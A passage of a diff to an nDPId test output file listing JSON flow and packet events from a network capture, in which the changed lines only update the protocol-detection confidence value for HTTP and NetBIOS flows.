+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1470104379169,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379169,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcB6nEL4Juf0WoASchCfpwAAAgQFtAEBBAIBAwMH"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcSHsZvpEuyGtoASchC7PAAAAgQFtAEBBAIBAwMH"} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcHaep2g2r0bEYASchAKkwAAAgQFtAEBBAIBAwMH"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwb\/T2SVtRRe+4IASchB7QAAAAgQFtAEBBAIBAwMH"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcLBVjGFF\/Pwi4ASchB9IQAAAgQFtAEBBAIBAwMH"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcMVSXssyIjeXYASchBBHwAAAgQFtAEBBAIBAwMH"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":362,"flow_tot_l4_payload_len":362,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/18283-jfyj3.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/13480-alps.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379119,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/4657-jfyj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3578-ywzj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379177,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3713-ydm.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379178,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/16649-ljdz.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":362,"flow_tot_l4_payload_len":362,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/18283-jfyj3.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/13480-alps.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379119,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/4657-jfyj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379175,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3578-ywzj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379177,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379177,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3713-ydm.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379178,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379178,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/16649-ljdz.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":196,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1470104379271,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104379271,"pkt":"AQBef\/\/6GF4PUugBCABFAAChMMsAAAER0qXAqAU57\/\/\/+toBB2wAjcGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":197,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1470104379271,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1470104379271,"pkt":"AQBef\/\/6SNIkYzEACABFAAChOp0AAAERyODAqAUs7\/\/\/+si9B2wAjdLxTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":198,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1470104379271,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104379271,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD1mgU6wAmi+DsIAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1470104379271,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104379271,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxsAAAER6ZTAqANf4AAA\/NZoFOsAJg3d7CAAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":200000,"flow_min_l4_payload_len":244,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1470104379579,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00774{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1470104379579,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":286,"pkt_l4_len":252,"thread_ts_msec":1470104379579,"pkt":"\/\/\/\/\/\/\/\/jHNut5QdCABFAAEQAABAAEARs0nAqAVDwKj\/\/wCKAIoA\/P+KEQouQ8CoBUMAigDmAAAgRkRFQkVPRUtFSkNORU1FSkVHRUZFQ0VQRVBFTENOQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJPAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAATAAAAAAAAAAAAAAAAAAAAAAAAABMAFYAAwABAAEAAgBdAFxNQUlMU0xPVFxCUk9XU0UAD1DgkwQAU0FOSkktTElGRUJPT0stTAQJA5qEAA8BVapzYW5qaS1MSUZFQk9PSy1MSDUzMSBzZXJ2ZXIgKFNhbWJhLCBVYnVudHUpAA=="} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":200000,"flow_min_l4_payload_len":244,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1470104379579,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":389,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379579,"flow_last_seen":1470104379579,"flow_idle_time":200000,"flow_min_l4_payload_len":244,"flow_max_l4_payload_len":244,"flow_tot_l4_payload_len":244,"flow_avg_l4_payload_len":244,"midstream":0,"thread_ts_msec":1470104379579,"l3_proto":"ip4","src_ip":"192.168.5.67","dst_ip":"192.168.255.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00741{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1470104379579,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":263,"pkt_l4_len":229,"thread_ts_msec":1470104379579,"pkt":"\/\/\/\/\/\/\/\/jHNut5QdCABFAAD5AABAAEARs2DAqAVDwKj\/\/wCKAIoA5V88EQouRMCoBUMAigDPAAAgRkRFQkVPRUtFSkNORU1FSkVHRUZFQ0VQRVBFTENOQUEAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAANQAAAAAAAAAAAAAAAAAAAAAAAAA1AFYAAwABAAEAAgBGAFxNQUlMU0xPVFxCUk9XU0UADFDgkwQAV09SS0dST1VQAAAAAAAAAAQJABAAgA8BVapTQU5KSS1MSUZFQk9PSy1MSDUzMQA="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1470104379887,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":98,"pkt_l4_len":44,"thread_ts_msec":1470104379887,"pkt":"MzMAAQACcD6s8PAHht1gBWEEACwRAf6AAAAAAAAABAZVqGRTJd3\/AgAAAAAAAAAAAAAAAQACAiICIwAsiDQLJ3MdAAEADgABAAEduOb7cD6s8PAHAAYABAAXABgACAACATQ="} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379903,"flow_last_seen":1470104379903,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379903,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -159,89 +159,89 @@ 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1470104379916,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1470104379916,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379916,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UgdAAIAG5uTAqHMIarkjbsHGAFDBDvagAAAAAIACIAAUOgAAAgQE7AEDAwgBAQQC"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1470104379940,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379940,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcUqRAQo3o9FnIASchAmawAAAgQFtAEBBAIBAwMH"} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379903,"flow_last_seen":1470104379941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1470104379941,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json","code":0,"content_type":"","user_agent":""}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379903,"flow_last_seen":1470104379941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":336,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1470104379941,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": {"hostname":"jp.kankan.1kxun.mobi","url":"jp.kankan.1kxun.mobi\/api\/videos\/10410.json","code":0,"content_type":"","user_agent":""}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1470104379954,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379954,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGguxquSNuwKhzCABQwcaIrnkOwQ72oYASchC\/lAAAAgQFtAEBBAIBAwMH"} -00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":409,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379916,"flow_last_seen":1470104379956,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":357,"flow_tot_l4_payload_len":357,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379956,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.1kxun","breed":"Fun","category":"Streaming"},"http": 